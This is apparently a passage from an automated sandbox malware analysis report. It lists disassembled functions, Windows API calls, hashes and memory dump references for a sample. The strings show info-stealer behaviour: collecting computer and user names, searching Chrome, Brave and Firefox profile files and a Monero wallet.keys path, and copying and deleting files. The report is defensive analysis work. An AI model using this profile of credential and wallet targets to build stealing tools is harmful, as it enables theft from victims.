                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                          • Instruction ID: 9bea2697903472f2613cbef14641007c939b3d9e925afcc9658e8b2384c61c32
                          • Opcode Fuzzy Hash: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                          • Instruction Fuzzy Hash: 19F0E271A41318BBE7149AA4AC59FAFB7ECE709B15F300988F604E3280D9719E40CAA0
                          Function 00911190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                            • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                            • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                            • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                            • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                            • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                          • ExitProcess.KERNEL32 ref: 009111C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                          • Instruction ID: 76662ba0645585471d80407e0367c7eab48268999fc079d928f6c79ef4e4af51
                          • Opcode Fuzzy Hash: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                          • Instruction Fuzzy Hash: 7FE017B5E1831563CA0073F0BC8BB2B769C5B9434AF040968FA09E3206FE25E800866A

                          Non-executed Functions

                          Function 009238B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 009238CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 009238E3
                          • lstrcat.KERNEL32(?,?), ref: 00923935
                          • StrCmpCA.SHLWAPI(?,00930F70), ref: 00923947
                          • StrCmpCA.SHLWAPI(?,00930F74), ref: 0092395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00923C67
                          • FindClose.KERNEL32(000000FF), ref: 00923C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                          • Instruction ID: 4b864ea7f1702756f7f2e293ba68d620f14d661fbca05505186f1f56e0c6a62c
                          • Opcode Fuzzy Hash: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                          • Instruction Fuzzy Hash: 9BA121B1A003189BDB24DF64DC85FEE737DBB88301F048698A64DA7145EB759B84CF62
                          Function 0091BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00930B32,00930B2B,00000000,?,?,?,009313F4,00930B2A), ref: 0091BEF5
                          • StrCmpCA.SHLWAPI(?,009313F8), ref: 0091BF4D
                          • StrCmpCA.SHLWAPI(?,009313FC), ref: 0091BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0091C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                          • Instruction ID: 9529a517fb7514f4852e30b769f26bf1bef15e88a53b73eaa15345b6462fe061
                          • Opcode Fuzzy Hash: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                          • Instruction Fuzzy Hash: 58424272A10118ABCB14FB60EC96FED737DAFD8300F404558F50AA7195EE349B49CB96
                          Function 00924910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0092492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00924943
                          • StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                          • StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                          • FindClose.KERNEL32(000000FF), ref: 00924B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                          • Instruction ID: d90b965799f7d59c1564475fbe87061bf34d4e2fa39d2c6a14e9702d85a60763
                          • Opcode Fuzzy Hash: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                          • Instruction Fuzzy Hash: 93612771500218ABCB24EBA0EC55FEE777CBB88701F0446D8B609A6145EF75EB85CF91
                          Function 00924570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                          • wsprintfA.USER32 ref: 009245A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                          • StrCmpCA.SHLWAPI(?,00930FC4), ref: 009245EB
                          • StrCmpCA.SHLWAPI(?,00930FC8), ref: 00924601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0092468B
                          • FindClose.KERNEL32(000000FF), ref: 009246A0
                          • lstrcat.KERNEL32(?,01050A30), ref: 009246C5
                          • lstrcat.KERNEL32(?,0104F880), ref: 009246D8
                          • lstrlen.KERNEL32(?), ref: 009246E5
                          • lstrlen.KERNEL32(?), ref: 009246F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                          • Instruction ID: bab89844420c2c48b9097e782125e2adf17d65bb39f232b0782ab0cb14f524ae
                          • Opcode Fuzzy Hash: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                          • Instruction Fuzzy Hash: 215145B5500218ABC764EB70DC89FED737CAB98701F4046C8F609A7194EF759B848F92
                          Function 00923EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00923EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00923EDA
                          • StrCmpCA.SHLWAPI(?,00930FAC), ref: 00923F08
                          • StrCmpCA.SHLWAPI(?,00930FB0), ref: 00923F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0092406C
                          • FindClose.KERNEL32(000000FF), ref: 00924081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                          • Instruction ID: ee108d88a1ae6b44f1647c096388b9f9723aa9c38258b81054f953efd39fb677
                          • Opcode Fuzzy Hash: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                          • Instruction Fuzzy Hash: FB5127B6900218ABCB24EBB0DC85FEE777CBB84301F4046C8B65997144DF75AB858F55
                          Function 0091ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0091ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0091ED55
                          • StrCmpCA.SHLWAPI(?,00931538), ref: 0091EDAB
                          • StrCmpCA.SHLWAPI(?,0093153C), ref: 0091EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0091F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                          • Instruction ID: 8248ea1231aed4d6196efab5492bfeade24a13947649b7e75253572a90e47509
                          • Opcode Fuzzy Hash: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                          • Instruction Fuzzy Hash: CBE1AD769111289BEB55FB60EC52FEE733CAF94300F404599F50A62096EE306F8ACF56
                          Function 0091F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009315B8,00930D96), ref: 0091F71E
                          • StrCmpCA.SHLWAPI(?,009315BC), ref: 0091F76F
                          • StrCmpCA.SHLWAPI(?,009315C0), ref: 0091F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0091FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                          • Instruction ID: 32fa09c4ca2af7fb5d1592b08aaddd1a455d316bdb7b60124372662fca917c7c
                          • Opcode Fuzzy Hash: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                          • Instruction Fuzzy Hash: 7BB11672A001189BDB24FF60EC96BED7379AFD4300F4085A8E50A97195EF345B49CF96
                          Function 009116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0093510C,?,?,?,009351B4,?,?,00000000,?,00000000), ref: 00911923
                          • StrCmpCA.SHLWAPI(?,0093525C), ref: 00911973
                          • StrCmpCA.SHLWAPI(?,00935304), ref: 00911989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00911D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00911DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00911E20
                          • FindClose.KERNEL32(000000FF), ref: 00911E32
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
